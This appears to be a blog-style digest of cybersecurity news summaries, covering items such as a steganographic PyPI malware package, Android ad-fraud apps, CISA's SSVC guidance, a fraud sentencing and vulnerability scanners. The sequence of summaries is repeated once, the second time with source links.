Malicious Package on PyPI Hides Behind Image Files, Spreads Via GitHub
A new malicious package has been found on the Python Package Index (PyPI) repository that could hide code in images with a steganographic technique and infect users through open-source projects on Github.
The code in question was responsible for manually installing additional requirements, then downloading a picture from the web and using the newly installed package to process the image and trigger the processing generated output using the exec command.
Findings indicate that PyPI malicious packages and related obfuscation techniques are evolving rapidly. To protect against attacks like this, Check Point Research recommends companies use threat code scanners to double-check third-party packages and ensure that ratings on projects on GitHub are not synthetically generated.
Top Cyber Attacks of 2020
During the coronavirus pandemic, a big portion of the population switched to working, buying, studying, and watching content online. As a result, cybercriminals now have more access to potential victims than ever before.
The term “Zoombomb” was coined when hackers would break into a private Zoom meeting or online class and shout profanities and racist epithets or flash pornographic images. In an effort to politicize the coronavirus pandemic, nation-state hacker groups launched assaults against organizations working to contain it, including as the World Health Organization and the Centers for Disease Control and Prevention.
In response to the massive economic precarity caused by the epidemic, even commonplace cyberattacks like email phishing, social engineering, and refund fraud took on a darker character.
Secure Coding Practices for Developers https://blog.convisoappsec.com/en/secure-coding-practices-for-developers/
This blog talks about the secure coding practices for developers and it also highlights the problem that may occur if launching product without reviewing or testing code for its performance and security.
• Clean and check all entries
• Don’t keep secrets in code
• Check for vulnerabilities in dependencies and external packages
• Apply secure authentication
• Apply the principle of least privilege
Clicker Malware Garners Estimated 20 Million Downloads
“Clicker” malware designed to facilitate ad fraud has been found on 16 mobile apps in the Google Play store, according to McAfee. Detected as Android/Clicker, the malware was inserted into legitimate-looking utility apps such as flashlights, QR readers, cameras, unit converters and task managers.
Once the application is opened, it downloads its remote configuration by executing an HTTP request. After the configuration is downloaded, it registers the FCM (Firebase Cloud Messaging) listener to receive push messages. The malware forces infected devices to visit and browse certain websites in the background, without the user’s knowledge.
After being notified by the security vendor, Google has removed the offending apps, which are estimated to have garnered as many as 20 million downloads.
Qatar World Cup Firms Urged to Upgrade Cyber-Threat Model
Organizing bodies and key partners of the FIFA World Cup in Qatar this autumn have been warned to enhance their resilience against a potential barrage of cyber-threats.
Threat intelligence firm Digital Shadows claimed that the world’s most-watched sporting event would invite scrutiny from a variety of threat actors.
“Scams could present themselves in many forms. For instance, financially motivated threat actors often plant in malicious URLs spoofing these events to fraudulent sites, hoping to maximize their chances of scamming naive internet users for a quick profit,” it warned in a blog post.
“At the same time, hacktivist groups may exploit the public attention given to such events to exponentially increase the reach of their message. State-sponsored advanced persistent threat (APT) groups may also decide to target global sporting events like the Qatar 2022 World Cup to achieve state goals to the hosting country or the broader event community.”
Digital Shadows urged organizations to take a risk-based approach to cybersecurity ahead of the event, focusing on cyber-hygiene best practices such as regular patching, multi-factor authentication (MFA) and phishing awareness.
“A risk-based approach enables your organization to adapt its cybersecurity program to specific needs and vulnerabilities by considering the potential impact of a certain phenomenon and its likelihood,” it concluded.
CISA has published guidance for the Stakeholder-Specific Vulnerability Classification (SSVC), which is a vulnerability management approach that assesses vulnerabilities and prioritizes remediation based on the development status, security impact, and prevalence of affected products in a single system. Executive Assistant Director (EAD) Eric Goldstein claims that implementing methodologies such as SSVC is a key step in advancing the vulnerability management ecosystem: the CISA’s Known Exploited Vulnerabilities (KEV) catalog, Common Security Advisory Framework (CSAF) and vulnerabilities Vulnerability Exploitability Exchange (VEX) is used in conjunction with SSVC to further reduce the window for cyber threat actors to exploit U.S. network. There is an urgent need for a standardized method for vendors to disclose security vulnerabilities to end users in an accelerated and automated manner, particularly during intense commercial periods such as the holidays. CISA encourages organizations to use its version of SSVC for vulnerability management. SSVC provides a customized decision tree model that helps companies prioritize vulnerability responses.
For their involvement in the Nigerian-run business, George Ugochukwu Egwumba, 47, of Cypress, and Princewell Arinze Duru, 33, of Sacramento, received sentences of more than 10 years apiece from different California courts.
In June, both men were found guilty of wire fraud and money laundering. The scheme saw victims, including elderly ones, being defrauded of at least $6 million, and there are currently 80 suspects in custody. They are only two of them.
The Department of Justice (DoJ), which announced the sentencing, stated that “members of the conspiracy, many of whom were situated in Nigeria, used middlemen to communicate with their fellow co-conspirators stationed in the United States.”
The scheme involved “a wide range of frauds, including frauds involving business email compromise (BEC), romance scams, elder fraud, and fraud employing.
Through US bank accounts, money-transfer services like Western Union or MoneyGram, or cryptocurrencies, “the US-based middlemen participated in receiving and laundering the proceeds of the frauds.”
While engaging in fraud himself “using malware and other cybercrime tools,” Egwumba obtained bank account information from collaborators to give to further criminals. He obtained bank account information from his fellow thieves through chat messages, which he then utilized to accept stolen money.
By opening fictitious company bank accounts, employing money-transfer services, and using cryptocurrency wallets, Duru assisted his fellow cybercriminals in receiving and laundering the proceeds of their crimes.
One of the ringleaders, Chuks Eroha, 42, is still at large and is thought to have fled to Nigeria after the Federal Bureau of Investigation issued a warrant for his arrest in 2017. The US authorities have so far obtained 19 guilty pleas in connection with the cyber fraud operation.
Almost all applications these says have at least one vulnerability or misconfiguration that affects security. While many of the misconfigurations and vulnerabilities are considered to be of medium severity or less, at least 25% are rated highly or critically severe .”This really just points out that, [while] organizations may be doing a good job performing static scans to lower the number of coding vulnerabilities, they are not taking configuration into account, as it may be more difficult.” The data argues for the benefits of using multiple tools to analyze software for vulnerabilities and misconfigurations. Synopsys released data from a variety of different tests with each having similar top offenders. Weak configurations of encryption technology — namely, Secure Sockets Layer (SSL) and Transport Layer Security (TLS) — topped the charts for static, dynamic, and mobile application security tests, for example. Static and dynamic testing as well as software composition analysis (SCA) all have advantages and should be used together to have the highest chance to detect potential misconfigurations and vulnerabilities, says Synopsys’s Kelly, “These types of issues can be found in the early stages of the software development lifecycle (SDLC), such as the development and DevOps phases, which reduces the number that make it into production,” he says.
I’d like to share some Vulnerability Scanners:
– Acunetix
Acunetix is a Web vulnerability scanner with advanced crawling technology that looks for vulnerabilities to search all types of web pages, even those that are password-protected.
– BeSECURE
BeSECURE can continuously scan for network and application vulnerabilities, with daily updates and specialized testing methods capturing 99.99% of detectable vulnerabilities
– Nessus
Nessus is a remote security scanning tool that scans a computer and alerts it if it finds any vulnerabilities
– Burp Suite
BurpSuite is a constantly evolving vulnerability scanning tool that provides integrations for easy ticket generation
A live stream failing in Nevada is “one of the ways blue states steal elections.”
About a week ago, a computer application security incident occurred in Washoe County in Nevada. It has been reported that Washoe county went dark overnight on November 9, 2022. Due to the sequence of events, there are claims on social media alleging the officials were involved in some sort of wrongdoing to alter the election results.
The live stream computer application lost connection with the courtesy cameras at 11:24 p.m. on the evening of November 9. Surprisingly, all staff had left for the night about 60 minutes prior to the incident and did not arrive back at the office until 7 a.m., the next day. The connection was restored at 7:53 a.m. on the morning of November 10.
One of the recommendations to mitigate the risk documented on the county’s website is to look for a solution that would prevent software disruptions in the future or avoid a courtesy live stream feed. They believe that it will maintain transparency and minimize unnecessary speculation about interference with elections.
APT hackers compromised several countries’ digital certificate authorities and other government agencies with the intent to steal legitimate digital certificates. It was done using penetration testing tools. a loader malware created a back door that allowed the threat actors to access the victim’s network.
Malicious Package on PyPI Hides Behind Image Files, Spreads Via GitHub
A new malicious package has been found on the Python Package Index (PyPI) repository that could hide code in images with a steganographic technique and infect users through open-source projects on Github.
The code in question was responsible for manually installing additional requirements, then downloading a picture from the web and using the newly installed package to process the image and trigger the processing generated output using the exec command.
Findings indicate that PyPI malicious packages and related obfuscation techniques are evolving rapidly. To protect against attacks like this, Check Point Research recommends companies use threat code scanners to double-check third-party packages and ensure that ratings on projects on GitHub are not synthetically generated.
https://www.infosecurity-magazine.com/news/malicious-package-pypi-hides-image/
Top Cyber Attacks of 2020
During the coronavirus pandemic, a big portion of the population switched to working, buying, studying, and watching content online. As a result, cybercriminals now have more access to potential victims than ever before.
The term “Zoombomb” was coined when hackers would break into a private Zoom meeting or online class and shout profanities and racist epithets or flash pornographic images. In an effort to politicize the coronavirus pandemic, nation-state hacker groups launched assaults against organizations working to contain it, including as the World Health Organization and the Centers for Disease Control and Prevention.
In response to the massive economic precarity caused by the epidemic, even commonplace cyberattacks like email phishing, social engineering, and refund fraud took on a darker character.
https://thehackernews.com/2021/01/top-cyber-attacks-of-2020.html
Secure Coding Practices for Developers
https://blog.convisoappsec.com/en/secure-coding-practices-for-developers/
This blog talks about the secure coding practices for developers and it also highlights the problem that may occur if launching product without reviewing or testing code for its performance and security.
• Clean and check all entries
• Don’t keep secrets in code
• Check for vulnerabilities in dependencies and external packages
• Apply secure authentication
• Apply the principle of least privilege
Clicker Malware Garners Estimated 20 Million Downloads
“Clicker” malware designed to facilitate ad fraud has been found on 16 mobile apps in the Google Play store, according to McAfee. Detected as Android/Clicker, the malware was inserted into legitimate-looking utility apps such as flashlights, QR readers, cameras, unit converters and task managers.
Once the application is opened, it downloads its remote configuration by executing an HTTP request. After the configuration is downloaded, it registers the FCM (Firebase Cloud Messaging) listener to receive push messages. The malware forces infected devices to visit and browse certain websites in the background, without the user’s knowledge.
After being notified by the security vendor, Google has removed the offending apps, which are estimated to have garnered as many as 20 million downloads.
https://www.infosecurity-magazine.com/news/clicker-malware-20-million/
Qatar World Cup Firms Urged to Upgrade Cyber-Threat Model
Organizing bodies and key partners of the FIFA World Cup in Qatar this autumn have been warned to enhance their resilience against a potential barrage of cyber-threats.
Threat intelligence firm Digital Shadows claimed that the world’s most-watched sporting event would invite scrutiny from a variety of threat actors.
“Scams could present themselves in many forms. For instance, financially motivated threat actors often plant in malicious URLs spoofing these events to fraudulent sites, hoping to maximize their chances of scamming naive internet users for a quick profit,” it warned in a blog post.
“At the same time, hacktivist groups may exploit the public attention given to such events to exponentially increase the reach of their message. State-sponsored advanced persistent threat (APT) groups may also decide to target global sporting events like the Qatar 2022 World Cup to achieve state goals to the hosting country or the broader event community.”
Digital Shadows urged organizations to take a risk-based approach to cybersecurity ahead of the event, focusing on cyber-hygiene best practices such as regular patching, multi-factor authentication (MFA) and phishing awareness.
“A risk-based approach enables your organization to adapt its cybersecurity program to specific needs and vulnerabilities by considering the potential impact of a certain phenomenon and its likelihood,” it concluded.
https://www.infosecurity-magazine.com/news/qatar-world-cup-firms-upgrade/
CISA has published guidance for the Stakeholder-Specific Vulnerability Classification (SSVC), which is a vulnerability management approach that assesses vulnerabilities and prioritizes remediation based on the development status, security impact, and prevalence of affected products in a single system. Executive Assistant Director (EAD) Eric Goldstein claims that implementing methodologies such as SSVC is a key step in advancing the vulnerability management ecosystem: the CISA’s Known Exploited Vulnerabilities (KEV) catalog, Common Security Advisory Framework (CSAF) and vulnerabilities Vulnerability Exploitability Exchange (VEX) is used in conjunction with SSVC to further reduce the window for cyber threat actors to exploit U.S. network. There is an urgent need for a standardized method for vendors to disclose security vulnerabilities to end users in an accelerated and automated manner, particularly during intense commercial periods such as the holidays. CISA encourages organizations to use its version of SSVC for vulnerability management. SSVC provides a customized decision tree model that helps companies prioritize vulnerability responses.
https://www.securitymagazine.com/articles/98611-cisa-releases-vulnerability-management-methodology
Two men jailed in US for $6m cyber fraud scam
For their involvement in the Nigerian-run business, George Ugochukwu Egwumba, 47, of Cypress, and Princewell Arinze Duru, 33, of Sacramento, received sentences of more than 10 years apiece from different California courts.
In June, both men were found guilty of wire fraud and money laundering. The scheme saw victims, including elderly ones, being defrauded of at least $6 million, and there are currently 80 suspects in custody. They are only two of them.
The Department of Justice (DoJ), which announced the sentencing, stated that “members of the conspiracy, many of whom were situated in Nigeria, used middlemen to communicate with their fellow co-conspirators stationed in the United States.”
The scheme involved “a wide range of frauds, including frauds involving business email compromise (BEC), romance scams, elder fraud, and fraud employing.
Through US bank accounts, money-transfer services like Western Union or MoneyGram, or cryptocurrencies, “the US-based middlemen participated in receiving and laundering the proceeds of the frauds.”
While engaging in fraud himself “using malware and other cybercrime tools,” Egwumba obtained bank account information from collaborators to give to further criminals. He obtained bank account information from his fellow thieves through chat messages, which he then utilized to accept stolen money.
By opening fictitious company bank accounts, employing money-transfer services, and using cryptocurrency wallets, Duru assisted his fellow cybercriminals in receiving and laundering the proceeds of their crimes.
One of the ringleaders, Chuks Eroha, 42, is still at large and is thought to have fled to Nigeria after the Federal Bureau of Investigation issued a warrant for his arrest in 2017. The US authorities have so far obtained 19 guilty pleas in connection with the cyber fraud operation.
https://cybernews.com/news/two-men-jailed-for-cyber-fraud-scam/
https://www.darkreading.com/application-security/misconfigurations-vulnerabilities-found-in-95-of-applications
Almost all applications these says have at least one vulnerability or misconfiguration that affects security. While many of the misconfigurations and vulnerabilities are considered to be of medium severity or less, at least 25% are rated highly or critically severe .”This really just points out that, [while] organizations may be doing a good job performing static scans to lower the number of coding vulnerabilities, they are not taking configuration into account, as it may be more difficult.” The data argues for the benefits of using multiple tools to analyze software for vulnerabilities and misconfigurations. Synopsys released data from a variety of different tests with each having similar top offenders. Weak configurations of encryption technology — namely, Secure Sockets Layer (SSL) and Transport Layer Security (TLS) — topped the charts for static, dynamic, and mobile application security tests, for example. Static and dynamic testing as well as software composition analysis (SCA) all have advantages and should be used together to have the highest chance to detect potential misconfigurations and vulnerabilities, says Synopsys’s Kelly, “These types of issues can be found in the early stages of the software development lifecycle (SDLC), such as the development and DevOps phases, which reduces the number that make it into production,” he says.
I’d like to share some Vulnerability Scanners:
– Acunetix
Acunetix is a Web vulnerability scanner with advanced crawling technology that looks for vulnerabilities to search all types of web pages, even those that are password-protected.
– BeSECURE
BeSECURE can continuously scan for network and application vulnerabilities, with daily updates and specialized testing methods capturing 99.99% of detectable vulnerabilities
– Nessus
Nessus is a remote security scanning tool that scans a computer and alerts it if it finds any vulnerabilities
– Burp Suite
BurpSuite is a constantly evolving vulnerability scanning tool that provides integrations for easy ticket generation
https://www.coresecurity.com/blog/top-14-vulnerability-scanners-cybersecurity-professionals
A live stream failing in Nevada is “one of the ways blue states steal elections.”
About a week ago, a computer application security incident occurred in Washoe County in Nevada. It has been reported that Washoe county went dark overnight on November 9, 2022. Due to the sequence of events, there are claims on social media alleging the officials were involved in some sort of wrongdoing to alter the election results.
The live stream computer application lost connection with the courtesy cameras at 11:24 p.m. on the evening of November 9. Surprisingly, all staff had left for the night about 60 minutes prior to the incident and did not arrive back at the office until 7 a.m., the next day. The connection was restored at 7:53 a.m. on the morning of November 10.
One of the recommendations to mitigate the risk documented on the county’s website is to look for a solution that would prevent software disruptions in the future or avoid a courtesy live stream feed. They believe that it will maintain transparency and minimize unnecessary speculation about interference with elections.
https://www.politifact.com/factchecks/2022/nov/16/instagram-posts/nevada-ballot-counting-livestream-went-dark-but-vo/
https://washoelife.washoecounty.gov/washoe-county/registrar-of-voters-livestream-cameras/
APT hackers compromised several countries’ digital certificate authorities and other government agencies with the intent to steal legitimate digital certificates. It was done using penetration testing tools. a loader malware created a back door that allowed the threat actors to access the victim’s network.
https://cybersecuritynews.com/billbug-apt-malware/